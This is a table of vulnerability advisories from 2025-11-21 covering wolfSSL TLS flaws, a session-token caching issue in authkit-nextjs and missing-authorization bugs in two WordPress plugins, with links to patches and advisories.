| wolfSSL--wolfSSL | With TLS 1.3 pre-shared keys (PSK), a malicious or faulty server could ignore the request for PFS (perfect forward secrecy) and the client would continue the connection using the PSK without PFS. This happened when a server responded to a ClientHello containing psk_dhe_ke without a key_share extension. Continuing an authenticated PSK connection that, on the client's side, unexpectedly lacks PFS reduces the security of the connection. | 2025-11-21 | not yet calculated | CVE-2025-11935 | https://github.com/wolfSSL/wolfssl https://github.com/wolfSSL/wolfssl/pull/9112   |
| wolfSSL--wolfSSL | Improper input validation in the TLS 1.3 KeyShareEntry parsing in wolfSSL v5.8.2 on multiple platforms allows a remote unauthenticated attacker to cause a denial-of-service by sending a crafted ClientHello message containing duplicate KeyShareEntry values for the same supported group, leading to excessive CPU and memory consumption during ClientHello processing. | 2025-11-21 | not yet calculated | CVE-2025-11936 | https://github.com/wolfSSL/wolfssl https://github.com/wolfSSL/wolfssl/pull/9117   |
| wolfSSL--wolfSSL | Vulnerability in X25519 constant-time cryptographic implementations due to timing side channels introduced by compiler optimizations and CPU architecture limitations, specifically with the Xtensa-based ESP32 chips. If targeting Xtensa it is recommended to use the low-memory implementations of X25519, which are now turned on by default for Xtensa. | 2025-11-21 | not yet calculated | CVE-2025-12888 | https://github.com/wolfSSL/wolfssl/pull/9275   |
| wolfSSL--wolfSSL | In TLS 1.2 connections a client could use any supported digest, including a weaker one, rather than one of the digests listed in the server's CertificateRequest. | 2025-11-21 | not yet calculated | CVE-2025-12889 | https://github.com/wolfSSL/wolfssl/pull/9395   |
| workos--authkit-nextjs | The AuthKit library for Next.js provides convenient helpers for authentication and session management using WorkOS & AuthKit with Next.js. In authkit-nextjs version 2.11.0 and below, authenticated responses do not defensively apply anti-caching headers. In environments where CDN caching is enabled, this can result in session tokens being included in cached responses and subsequently served to multiple users. Next.js applications deployed on Vercel are unaffected unless they manually enable CDN caching by setting cache headers on authenticated paths. Patched in authkit-nextjs 2.11.1, which applies anti-caching headers to all responses behind authentication. | 2025-11-21 | not yet calculated | CVE-2025-64762 | https://github.com/workos/authkit-nextjs/security/advisories/GHSA-p8pf-44ff-93gf https://github.com/workos/authkit-nextjs/commit/94cf438124993abb0e7c19dac64c3cb5724a15ea https://github.com/workos/authkit-nextjs/releases/tag/v2.11.1   |
| WP Legal Pages--WP Cookie Notice for GDPR, CCPA & ePrivacy Consent | Missing Authorization vulnerability in WP Legal Pages WP Cookie Notice for GDPR, CCPA & ePrivacy Consent gdpr-cookie-consent allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Cookie Notice for GDPR, CCPA & ePrivacy Consent: from n/a through <= 4.0.3. | 2025-11-21 | not yet calculated | CVE-2025-66075 | https://vdp.patchstack.com/database/Wordpress/Plugin/gdpr-cookie-consent/vulnerability/wordpress-wp-cookie-notice-for-gdpr-ccpa-eprivacy-consent-plugin-4-0-3-broken-access-control-vulnerability?_s_id=cve   |
| wpWax--Legal Pages | Missing Authorization vulnerability in wpWax Legal Pages legal-pages allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Legal Pages: from n/a through <= 1.4.6. | 2025-11-21 | not yet calculated | CVE-2025-66077 | https://vdp.patchstack.com/database/Wordpress/Plugin/legal-pages/vulnerability/wordpress-legal-pages-plugin-1-4-6-broken-access-control-vulnerability?_s_id=cve   |
Contact us now: fix@hk-computer-repair.com
Useful links: